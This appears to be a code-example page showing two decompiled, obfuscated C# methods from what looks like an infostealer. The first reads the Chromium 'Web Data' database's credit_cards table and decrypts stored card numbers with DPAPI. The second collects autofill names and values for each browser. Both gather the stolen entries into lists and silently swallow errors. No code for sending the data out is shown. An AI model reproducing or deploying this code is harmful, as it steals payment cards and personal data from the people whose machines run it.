Exemple #1
0
 // Token: 0x06000235 RID: 565 RVA: 0x000114BC File Offset: 0x0000F6BC
 public static void smethod_6(string string_0)
 {
     try
     {
         string string_ = Path.Combine(string_0, "Web Data");
         CNT    cnt     = new CNT(Class30.smethod_3(string_));
         cnt.ReadTable("credit_cards");
         for (int i = 0; i < cnt.RowLength; i++)
         {
             Class30.int_0++;
             try
             {
                 Class30.list_0.Add(string.Concat(new object[]
                 {
                     "Name : ",
                     cnt.ParseValue(i, "name_on_card").Trim(),
                     Environment.NewLine,
                     "Ex_Month And Year: ",
                     Convert.ToInt32(cnt.ParseValue(i, "expiration_month").Trim()),
                     "/",
                     Convert.ToInt32(cnt.ParseValue(i, "expiration_year").Trim() + Environment.NewLine + "Card_Number" + Class30.smethod_0(cnt.ParseValue(i, "card_number_encrypted"), DataProtectionScope.CurrentUser, null).Trim())
                 }));
             }
             catch
             {
             }
         }
     }
     catch
     {
     }
 }
Exemple #2
0
 // Token: 0x0600023B RID: 571 RVA: 0x00011860 File Offset: 0x0000FA60
 public static void fLujhrskIa(string string_0, string string_1)
 {
     try
     {
         string string_2 = Path.Combine(string_0, "Web Data");
         CNT    cnt      = new CNT(Class30.smethod_3(string_2));
         cnt.ReadTable("autofill");
         for (int i = 0; i < cnt.RowLength; i++)
         {
             Class31.int_0++;
             try
             {
                 Class31.list_0.Add(string.Concat(new string[]
                 {
                     Environment.NewLine,
                     "Name : ",
                     cnt.ParseValue(i, "name").Trim(),
                     Environment.NewLine,
                     "Value : ",
                     cnt.ParseValue(i, "value").Trim(),
                     Environment.NewLine,
                     "Browser : ",
                     string_1,
                     Environment.NewLine
                 }));
                 Class31.int_0++;
             }
             catch
             {
             }
         }
     }
     catch
     {
     }
 }